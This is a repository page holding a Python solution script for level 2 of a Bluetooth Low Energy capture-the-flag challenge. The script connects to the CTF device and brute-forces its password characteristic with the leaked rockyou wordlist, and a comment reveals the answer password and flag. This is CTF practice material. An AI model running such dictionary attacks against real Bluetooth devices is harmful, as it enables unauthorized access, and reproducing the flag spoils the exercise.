Fork: 0
0xRoM / BLE_CTF_V2
Transfer to URL with SHA Find file
Newer
Older
BLE_CTF_V2 / lvl_02.py
root on 11 Mar 2022 1 KB tidying for public release
Raw Blame History 
#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
  
'''
42  0x2A   READ WRITE   Enter password here. Use rockyou.
44  0x2C   READ 
46  0x2E   READ WRITE   write here to goto to scoreboard

password1234 - eca7d1f3cf60a8b5344a
'''

rockyou = "/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt"

deviceMAC = open('ctf_mac.txt').read()  
p = btle.Peripheral(deviceMAC)
svc=p.getServiceByUUID(0x00FF)
print ("Attached to peripheral")

print("Loading level 02")
hex1 = binascii.unhexlify(str('%0*x' % (4,2)))
p.writeCharacteristic(0x30, hex1, withResponse=False)

with open(rockyou) as f: 
    for password in f: 
    
        sys.stdout.write("\rTrying: %s                                          " % password.rstrip())
        response = p.writeCharacteristic(0x2A, password.rstrip(), withResponse=True)
        
        hex1 = p.readCharacteristic(0x2C)
        hex2 = binascii.b2a_hex(hex1) 
        hexlif2 = str(binascii.unhexlify(hex2))
        
        if hexlif2 <> "":
           print "\rPassword Found: %s" % password.rstrip() 
           print "Flag: %s" % hexlif2
           break; 
            
p.disconnect()